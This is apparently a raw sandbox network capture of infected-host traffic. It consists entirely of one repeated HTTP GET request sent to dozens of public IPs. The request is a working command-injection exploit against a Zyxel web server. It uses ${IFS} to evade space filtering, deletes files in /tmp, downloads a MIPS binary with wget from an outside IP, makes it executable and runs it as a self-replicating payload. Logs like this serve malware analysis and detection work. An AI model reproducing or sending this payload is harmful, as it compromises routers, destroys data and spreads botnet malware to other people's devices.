                                        Mar 31, 2024 09:20:36.295609951 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1297192.168.2.2338504133.171.58.93443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.295666933 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1298192.168.2.235532225.61.62.107443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.295698881 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1299192.168.2.2348964195.66.59.12443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.295738935 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1300192.168.2.23555785.100.223.231443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.295778036 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1301192.168.2.234815088.64.51.186443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.295818090 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1302192.168.2.2339352207.28.80.73443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.295845985 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1303192.168.2.235839683.115.10.75443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.295907021 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1304192.168.2.2334934105.224.236.183443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.295941114 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1305192.168.2.233385891.13.197.246443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.295973063 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1306192.168.2.235204634.54.225.52443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.296025991 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1307192.168.2.235514459.23.97.52443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.296067953 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1308192.168.2.2342412191.219.51.76443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.296102047 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1309192.168.2.2347152202.149.135.209443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.296143055 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1310192.168.2.2335634185.208.216.182443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.296191931 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1311192.168.2.2339164148.127.55.126443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.296225071 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1312192.168.2.2335636168.96.98.242443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.296257973 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1313192.168.2.2352462220.173.185.133443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.296313047 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1314192.168.2.2342542199.94.249.57443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.296344042 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1315192.168.2.2355948109.234.29.81443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.296390057 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1316192.168.2.2334918191.144.18.68443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.296433926 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1317192.168.2.2356220196.147.179.42443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.296480894 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1318192.168.2.2336432136.24.140.130443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.296534061 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1319192.168.2.2336262165.111.16.36443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.296566963 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1320192.168.2.234694895.6.223.244443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.296600103 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1321192.168.2.2343918102.110.190.229443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.296643019 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1322192.168.2.233435036.212.212.16443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.296673059 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1323192.168.2.234216046.166.243.153443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.296706915 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1324192.168.2.2359674171.235.82.177443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.296745062 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1325192.168.2.2359178191.237.114.52443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.296793938 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1326192.168.2.2346036133.199.29.142443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.296844959 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1327192.168.2.235287470.133.204.17443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.296880007 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1328192.168.2.23499321.114.233.202443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.296909094 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1329192.168.2.234786212.58.210.46443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.296943903 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1330192.168.2.2353052172.90.197.75443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.296973944 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1331192.168.2.2334770146.74.173.159443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.297014952 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1332192.168.2.234799447.197.45.148443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.297045946 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1333192.168.2.2336066220.138.200.115443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.297110081 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1334192.168.2.234765681.185.116.209443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.297139883 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1335192.168.2.2335526153.39.214.216443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.297182083 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1336192.168.2.2344160172.159.84.16443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.297213078 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1337192.168.2.234236460.143.82.114443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.297259092 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1338192.168.2.2333868148.149.245.189443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.297318935 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1339192.168.2.2341134180.165.86.206443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.297353029 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1340192.168.2.2336328149.141.193.200443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.297404051 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1341192.168.2.2343300167.249.170.89443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.297444105 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1342192.168.2.2359070105.12.202.50443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.297496080 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1343192.168.2.234926436.186.52.10443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.297547102 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1344192.168.2.2333268148.12.43.95443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.297588110 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1345192.168.2.234476046.194.112.220443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.297614098 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1346192.168.2.2344278199.201.171.67443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.297652960 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1347192.168.2.2347708126.112.10.252443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.297699928 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1348192.168.2.2335948144.108.3.166443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.297741890 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1349192.168.2.2343342216.90.186.173443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.297791004 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1350192.168.2.2348724103.245.75.158443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.297825098 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1351192.168.2.2357942108.221.105.190443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.297874928 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1352192.168.2.235604624.193.96.63443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.297930002 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1353192.168.2.234705490.97.202.29443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.297962904 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1354192.168.2.2336850165.97.42.59443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.298007011 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1355192.168.2.2337010111.27.9.96443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.298063040 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1356192.168.2.2351928143.147.245.163443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.298120975 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1357192.168.2.2335790223.68.32.36443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.298155069 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1358192.168.2.2333880169.23.4.241443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.298188925 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1359192.168.2.2358994200.63.149.179443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.298248053 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1360192.168.2.233465653.26.148.170443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.298284054 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1361192.168.2.234658651.105.183.161443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.298348904 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1362192.168.2.235201275.201.32.10443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.298397064 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1363192.168.2.235173276.138.153.85443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.298432112 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1364192.168.2.2345824189.240.83.18443
                                        TimestampBytes transferredDirectionData
